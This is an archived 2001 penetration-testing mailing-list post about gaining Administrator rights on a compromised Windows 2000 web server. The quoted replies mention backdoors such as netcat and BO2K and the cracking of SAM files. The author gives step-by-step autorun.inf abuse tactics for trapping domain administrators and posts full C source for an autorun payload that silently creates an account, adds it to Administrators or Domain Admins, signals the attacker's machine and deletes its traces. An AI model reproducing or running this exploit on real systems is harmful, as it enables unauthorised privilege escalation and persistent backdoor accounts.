Penetration Testing mailing list archives
Re: [PEN-TEST] Expand right under Win2K
From: "Nelson Brito (a.k.a. stderr)" <stderr () SEKURE ORG>
Date: Wed, 10 Jan 2001 13:59:44 -0200
Paul Cardon wrote:
Charlie Rhodes wrote:We have a win2k where we have access to a cmd.exe with the rights of the web-server and we would like to obtain administrator rights. Also we don't have the rights to read the SAM files. We tried the well-known methdos under win NT 4.0 (like breaknt.exe, read from raw device) in vain.Do you have network (ftp) access? or floppy access? http://www.bo2k.com should do the trick. You'll probably want to configure the server part off the machine, then load it on.This is the second time this question has been asked on the list and almost everybody misunderstands the problem. Let me restate it: Suppose a pen-tester has used the IIS Unicode vulnerability to download a back door such as a netcat listener to the target Win2K server and now has a remote cmd shell. At this point the remote shell is running with IUSR_<MACHINE> privilege since that is the privilege level that the Unicode vulnerability provides. Now, how does the pen-tester elevate privilege to Administrator? Any software that is downloaded (tftp, ftp, whatever) through the remote command shell will only run with IUSR_<MACHINE> privilege. Why do people think that downloading BO2K, netcat, or some such will magically elevate privilege? It doesn't. The only things that are possible are: 1) There is a known privilege escalation vulnerability that can be exploited with local unprivileged access. The attacker can download and run that code to gain Administrator access.
You can use another Win2k || NT Machine to execute programs, like: 1 - Copy a "hacked version" of autorun.inf + hacked program to another Win2K || NT MAchine; 2 - Put the root directory that host autorun.inf in shared mode; 3 - In the IIS Unicode Transversal Machine, mount the shared directory; 4 - Now, you'll see the "hacked autorun.inf" executing arbritary commands. I think this will hope you... Another way to do this is: 1 - Find the PDC(if exist) in domain; 2 - Find the "mountable directory" for "Domain Admins"; 3 - Put the "hacked autorun.inf" in this directory; 4 - Sit and relax while waiting a member of "Domain Admins" log. You could do this with a "Shell Folder" vulnerability, and others...
2) Brute force attack against accounts with local Administrator privilege.
You can crack the SAM File, coz the IUSR_<MACH> have permission to read this file.
3) Look for vulnerabilities in other systems that the web server can talk to. Some of those may expose Domain accounts with Administrator privilege on the web server or other systems that are trusted by the web server. There are others but Win2K does limit some of the nicer possibilities that existed with NT. -paul
A source example to "hacked autorun.inf" and program looks like: --- autorun.cpp /**************************************************************************************** * Autor : Nelson Brito * * E-mail : nelson () secunet com br && stderr () sekure org * * URL : http://stderr.sekure.org && http://www.secunet.de * * Data : Belem, 09 de Dezembro de 2000. * * Publicado: Rio de Janeiro, 09 de Janeiro de 2001. * ****************************************************************************************/ /**************************************************************************************** * Para explorar esta vulnerabilidade voce tera' que usar o seu cerebro, pois eu nao * * irei lhe ensinar a como utiliza-lo, estou apenas divulgando o codigo. * * * * Agradecimentos: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer, Thiago(c0nd0r), * * Felipe(falcon), corb@sekure(what's up?), Nilson Brito(brother), * * Andre Silveira(phD), Charlene(mi amore) e Mamae... =) * ****************************************************************************************/ #include <stdio.h> #include <stdlib.h> #include <process.h> /* A funcao execl() no VC++. */ FILE *fp; int main(void){ char *windir = (char *)getenv("WINDIR"); // Onde esta o %SystemRoot%? char *batch = "C:\\TEMP\\nelson.bat"; // Batch File temporario. /********************************************************************************** * Sim, eu sei, eu poderia ter utilizado "NetUserAdd()" e "NetGroupAdd()", mas * * achei melhor utilizar um arquivo "batch" temporario, fica menor o codigo. * **********************************************************************************/ if(!(fp = fopen(batch, "w"))){ perror("fopen"); exit(0); } fprintf(fp, "@echo off\n"); fprintf(fp, "@%s\\system32\\net.exe user nelson secunet /fullname:\"Nelson Brito from Security Networks AG / IBQN\" /comment:\"Penetration Test Account\" /add > nul\n", windir); /********************************************************************************** * Aqui voce devera' definir se sera' utilizado em um DC ou Stand Alone. * **********************************************************************************/ #ifdef _IS_A_PDC_ fprintf(fp, "@%s\\system32\\net.exe group Administrators nelson /add > nul\n", windir); fprintf(fp, "@%s\\system32\\net.exe group \"Domain Admins\" nelson /add > nul\n", windir); #else fprintf(fp, "@%s\\system32\\net.exe localgroup Administrators nelson /add > nul\n", windir); #endif /********************************************************************************** * Ao final de tudo, sera' enviada uma mensagem para a maquina PITBULL, a minha * * maquina. =) * **********************************************************************************/ fprintf(fp, "@%s\\system32\\net.exe send PITBULL \"Autorun Privilege Escalation Exploit Executed\"\n", windir); fprintf(fp, "@%s\\system32\\cmd.exe /c del %s\n", windir, batch); fclose(fp); execl(batch, batch, NULL); // Executando o batch file temporario. perror("execl"); // Erro de execucao. return(0); } --- autorun.cpp --- autorun.inf [autorun] open=autorun.exe --- autorun.inf PS: It's work with PGPDisk, at the mount time. When you mount the PGPDisk, the SYSTEM recognize as a mount point, then it executes the "hacked autorun.inf". Sem mais, -- Nelson Brito Security Analyst && Penetration Tester Security Networks AG / IBQN - http://www.secunet.de/
Current thread:
- [PEN-TEST] Expand right under Win2K Foldi Tamas (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Charlie Rhodes (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Tamas Foldi (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
- Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Pascal C. Kocher (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Charlie Rhodes (Jan 09)
- <Possible follow-ups>
- Re: [PEN-TEST] Expand right under Win2K Edwards, David (JTD) (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Complx1 * (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Edwards, David (JTD) (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Complx1 * (Jan 11)